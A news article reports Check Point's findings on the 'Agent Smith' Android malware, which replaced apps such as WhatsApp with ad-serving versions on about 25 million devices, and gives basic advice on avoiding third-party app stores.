'Agent Smith' Android Malware Secretly Replacing WhatsApp and Others Infects 25 Million Devices

agent smith android malwareAndroid devices are no stranger to malware threats and various malicious attacks mostly through infected apps. Unfortunately for Android devices, users tend to get apps malicious apps from the Google Play Store or from various third-party sources versus an iPhone user that often gets their apps from the controlled and mostly malware-free Apple App Store environment. As it turns out, the most recent rash of malware-plagued apps comes in the form of malware dubbed Agent Smith, which is known for secretly replacing the WhatsApp app on Android devices.

The Agent Smith Android malware looks to exploit vulnerabilities within the operating system where it will automatically replace legitimate apps without the user noticing. The primary apps that Agent Smith was found to secretly replace are WhatsApp, Flipkart, Opera Mini, and reportedly, apps from Lenovo and Swiftkey.

One particular thing to note about WhatsApp and it being exploited by the Agent Smith malware is the fact that WhatsApp has over 1.5 billion active users in over 180 countries. However, only a portion of those users are Android users, which has led to the Agent Smith app affecting upwards of 25 million devices thus far.

Where does Agent Smith come from?

Check Point was among the first to discover the Agent Smith malware, which gets its clever name from the popularized The Matrix series of movies as it acts somewhat similar to the character in the film named "Agent Smith".

A default list of apps is also suspected to be used on the core module of the Agent Smith malware to search for on an infected device. That list of app command and control servers, as revealed by Check Point, are as follows:

  • whatsapp
  • lenovo.anyshare.gps
  • mxtech.videoplayer.ad
  • jio.jioplay.tv
  • jio.media.jiobeats
  • jiochat.jiochatapp
  • jio.join
  • good.gamecollection
  • opera.mini.native
  • startv.hotstar
  • meitu.beautyplusme
  • domobile.applock
  • touchtype.swiftkey
  • flipkart.android
  • cn.xender
  • eterno
  • truecaller

As to where the malware originated, computer security researchers believe that a Chinese Internet company that helps Android developers in China publish and market apps in other foreign markets. The malware was first discovered on the third-party app store 9Apps and has mostly targeted Android users in Bangladesh, Pakistan, and India. However, within the 25 million infected Android devices, just over 300,000 were detected in the United States and over 130,000 in the UK.

Agent Smith has a deceptive agenda

In some instances, researchers at Check Point have revealed that Agent Smith was disguised as a Google-related app, further evading any suspicion by Android users. Moreover, the attacks performed by Agent Smith malware look to ultimately display fraudulent advertisements on infected devices potentially allowing the cybercrooks behind the malware to make money through advertisement impression or click campaigns.

As to the makeup of Agent Smith malware, researchers compared samples of threats and have drawn similar comparisons to that of the Janus vulnerability, which allows a threat actor to replace any application with an infected version. Such a method has been used in the past countless times on Windows PCs, Mac computers, and mobile devices, where apps are disguised as legitimate apps only to gain access to a system and perform malicious actions without the user's awareness.

Currently, app developers have been made aware of the Agent Smith threat but ultimately it is up to Android users to take the proper precautions to mitigate such an attack. One step Android users can do is to limit the download of apps from third-parties and only get them from trusted sources. Moreover, users can block adware loaded apps or enable additional security features. Either way, we haven't seen the last of Agent Smith or other emerging malware threats and we must be vigilant every step of the way because we don't want to get caught in THIS Matrix.